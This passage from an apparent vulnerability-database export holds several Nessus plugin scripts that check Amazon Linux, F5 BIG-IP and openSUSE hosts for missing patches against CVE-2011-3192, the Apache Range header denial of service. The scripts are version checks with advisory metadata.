script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.18.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:30", "bulletinFamily": "scanner", "description": "The byte-range filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial-of-service (memory and CPU consumption) using a Range header that expresses multiple overlapping ranges.", "modified": "2019-01-04T00:00:00", "id": "F5_BIGIP_SOL13114.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78131", "published": "2014-10-10T00:00:00", "title": "F5 Networks BIG-IP : Apache Range header vulnerability (SOL13114)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL13114.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78131);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_bugtraq_id(49303);\n\n script_name(english:\"F5 Networks BIG-IP : Apache Range header vulnerability (SOL13114)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The byte-range filter in the Apache HTTP Server 1.3.x, 2.0.x through\n2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a\ndenial-of-service (memory and CPU consumption) using a Range header\nthat expresses multiple overlapping ranges.\"\n );\n # http://devcentral.f5.com/weblogs/macvittie/archive/2011/08/26/f5-friday-zero-day-apache-exploit-zero-problem.aspx\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05e2e6a6\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://people.apache.org/~dirkx/CVE-2011-3192.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K13114\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL13114.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL13114\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"10.1.0-10.2.2\",\"11.0.0\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.0.0HF1\",\"11.1.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"9.2.2-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.2-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"9.4.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"9.4.0-9.4.8\",\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"10.0.0-10.2.2\",\"11.0.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"10.2.2HF3\",\"10.2.3\",\"11.0.0HF1\",\"11.1.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:21:39", "bulletinFamily": "scanner", "description": "This update fixes a remote denial of service bug (memory exhaustion) in the Apache 2 HTTP server, that could be triggered by remote attackers using multiple overlapping Request Ranges . (CVE-2011-3192)", "modified": "2018-11-10T00:00:00", "id": "SUSE_11_3_APACHE2-110831.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75425", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2011:0993-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5089.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75425);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:59\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_bugtraq_id(49303);\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2011:0993-1)\");\n script_summary(english:\"Check for the apache2-5089 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a remote denial of service bug (memory exhaustion)\nin the Apache 2 HTTP server, that could be triggered by remote\nattackers using multiple overlapping Request Ranges . (CVE-2011-3192)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=713966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-09/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-2.2.15-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-devel-2.2.15-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-certificates-2.2.15-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-example-pages-2.2.15-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-itk-2.2.15-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-prefork-2.2.15-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-utils-2.2.15-4.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-worker-2.2.15-4.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:21:48", "bulletinFamily": "scanner", "description": "This update fixes a remote denial of service bug (memory exhaustion) in the Apache 2 HTTP server, that could be triggered by remote attackers using multiple overlapping Request Ranges . (CVE-2011-3192)", "modified": "2018-11-10T00:00:00", "id": "SUSE_11_4_APACHE2-110831.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=75786", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2011:0993-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5089.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75786);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:59\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_bugtraq_id(49303);\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2011:0993-1)\");\n script_summary(english:\"Check for the apache2-5089 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a remote denial of service bug (memory exhaustion)\nin the Apache 2 HTTP server, that could be triggered by remote\nattackers using multiple overlapping Request Ranges . (CVE-2011-3192)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=713966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-09/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debugsource-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-devel-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-certificates-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-pages-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-debuginfo-2.2.17-4.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:19:55", "bulletinFamily": "scanner", "description": "The MITRE CVE database describes CVE-2011-3192 as :\n\nThe byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.", "modified": "2015-01-30T00:00:00", "id": "ALA_ALAS-2011-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69560", "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2011-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-01.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69560);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2015/01/30 14:43:52 $\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_xref(name:\"ALAS\", value:\"2011-01\");\n script_xref(name:\"RHSA\", value:\"2011:1245\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-01)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MITRE CVE database describes CVE-2011-3192 as :\n\nThe byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through\n2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a\ndenial of service (memory and CPU consumption) via a Range header that\nexpresses multiple overlapping ranges, as exploited in the wild in\nAugust 2011, a different vulnerability than CVE-2007-0086.\"\n );\n # http://lists.opensuse.org/opensuse-security-announce/2011-09/msg00006.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4868d419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ubuntu.com/usn/USN-1199-1/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum upgrade httpd' to upgrade your system. Then run 'service\nhttpd restart' to restart the Apache HTTP Server.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.18.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:19:32", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2011:1245 :\n\nUpdated httpd packages 